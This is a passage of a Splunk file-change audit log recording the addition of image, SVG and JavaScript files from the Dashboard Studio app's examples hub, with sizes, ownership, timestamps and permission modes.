action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/datacenter.png", isdir=0, size=381408, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.901, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/data-streaming.jpeg", isdir=0, size=723051, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.897, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/data-command.jpeg", isdir=0, size=1431793, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.892, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/customer.jpeg", isdir=0, size=149849, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.885, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/buttercup.jpeg", isdir=0, size=277007, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.881, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/assembly.png", isdir=0, size=724312, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.876, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/airport.jpeg", isdir=0, size=585286, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.869, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/VPN.jpeg", isdir=0, size=707569, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.864, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples/ER.jpeg", isdir=0, size=353940, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.759, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/search/test.png", isdir=0, size=2815, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.756, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/search/report.png", isdir=0, size=7486, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.751, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/search/post.png", isdir=0, size=3351, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.746, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/search/inline.png", isdir=0, size=3274, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.642, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/choropleth_svg/campus-map.svg", isdir=0, size=67133, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.638, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/choropleth_svg/California.svg", isdir=0, size=103998, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.632, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/data-streaming/splunk.png", isdir=0, size=5908, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.628, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/data-streaming/signalfx.png", isdir=0, size=8828, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.625, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/data-streaming/background.jpg", isdir=0, size=1535429, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.621, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/data-streaming/aws.png", isdir=0, size=21583, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.615, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/europe_network_hub/europe_network_hub_background_image.jpg", isdir=0, size=2355597, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.611, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/buttercup/buttercup.png", isdir=0, size=199749, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.605, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/images/vpn_health_by_region_background_image.jpeg", isdir=0, size=146684, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.601, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/images/default.png", isdir=0, size=7923, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.596, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/images/buttercup_go.png", isdir=0, size=18717, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.590, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/images/background_buttercup.jpg", isdir=0, size=125113, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.483, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/vpn_health_by_region/vpn_health_by_region_background_image.jpeg", isdir=0, size=146684, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.478, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/mdg/background.png", isdir=0, size=2532076, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.472, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/assembly/truck.png", isdir=0, size=7864, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.468, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/assembly/background.png", isdir=0, size=3041433, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.464, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/ecommerce/background.png", isdir=0, size=1992708, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.458, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/datacenter/Servers.png", isdir=0, size=1840891, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.454, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/datacenter/Background_v2.png", isdir=0, size=1299364, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.450, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/world-map.png", isdir=0, size=21517, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.446, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/us-map.png", isdir=0, size=33072, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.441, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/text.png", isdir=0, size=11500, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.437, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/table.png", isdir=0, size=7140, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.431, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/svg-map.png", isdir=0, size=23725, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.427, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/sv.png", isdir=0, size=6321, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.421, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/shapes.png", isdir=0, size=4702, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.417, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/scatter.png", isdir=0, size=1186, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.413, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/radial.png", isdir=0, size=7412, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.409, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/punchcard.png", isdir=0, size=169048, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.405, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/pie.png", isdir=0, size=14782, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.399, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/marker.png", isdir=0, size=6878, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.395, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/line.png", isdir=0, size=37618, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.390, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/img.png", isdir=0, size=220621, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.386, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/icon-2.png", isdir=0, size=4472, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.382, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/icon-1.png", isdir=0, size=3983, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.378, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/filler.png", isdir=0, size=6092, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.374, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/column.png", isdir=0, size=1986, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.369, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/bubble.png", isdir=0, size=15669, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.358, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/bar.png", isdir=0, size=1128, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.349, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/background.png", isdir=0, size=3754992, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.345, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home/area.png", isdir=0, size=7201, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.139, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/data-command/datacommand.jpg", isdir=0, size=408826, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.134, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/workplace/workforce_background.png", isdir=0, size=3277722, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.129, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/workplace/return-to-work-background.png", isdir=0, size=61886, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:00.022, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/workplace", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:00.017, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/vpn_health_by_region", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:00.013, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/search", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:00.007, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/mdg", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.998, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/inputs", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.994, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/images", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.989, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/home", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.984, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/healthcare_dashboard", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.980, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/europe_network_hub", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.974, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/ecommerce", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.970, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/datacenter", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.964, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/data-streaming", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.960, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/data-command", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.956, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/complete_examples", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.951, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/choropleth_svg", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.946, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/buttercup", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.942, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/assembly", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.937, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/Home.png", isdir=0, size=796, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.933, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub/Back.png", isdir=0, size=518, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.828, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/home/inputs.gif", isdir=0, size=2034333, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.825, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/home/grid.png", isdir=0, size=175709, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.822, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/home/export.png", isdir=0, size=156477, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.818, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/home/banner.png", isdir=0, size=788204, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.814, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/home/background.png", isdir=0, size=1592837, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.811, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/home/absolute.png", isdir=0, size=717863, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.705, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/home", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.701, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/images/examples-hub", isdir=1, size=4096, gid=41812, uid=41812, modtime="Wed Mar 31 20:43:24 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:42:59.697, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/vendors.js.LICENSE.txt", isdir=0, size=16331, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.693, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/vendors.js", isdir=0, size=11025454, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.689, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/runtime.js", isdir=0, size=1488, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.684, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-world-map-visualization.js", isdir=0, size=109975, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.680, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-workplace-readiness.js", isdir=0, size=149325, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.675, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-workplace-readiness-detail.js", isdir=0, size=997701, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.669, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-vpn-health-by-region-dashboard.js", isdir=0, size=270435, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.664, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-visualization-datasource-defaults.js", isdir=0, size=86872, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.660, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-us-map-visualization.js", isdir=0, size=166344, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.656, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-text-visualization.js", isdir=0, size=73526, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.651, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-text-input.js", isdir=0, size=43369, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.647, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-test-data.js", isdir=0, size=52492, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.643, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-table-chart-visualization.js", isdir=0, size=89132, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.639, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-single-value-visualization.js", isdir=0, size=123537, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.634, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-single-value-radial-visualization.js", isdir=0, size=74661, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.629, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-shape-visualization.js", isdir=0, size=188146, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.625, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-scatter-chart-visualization.js", isdir=0, size=142340, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.620, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-saved-data.js", isdir=0, size=22028, gid=41812, uid=41812, modtime="Wed Mar 31 20:44:44 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:59.617, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk-dashboard-studio/appserver/static/build/examples/example-hub-punchcard-chart-visualization.js", 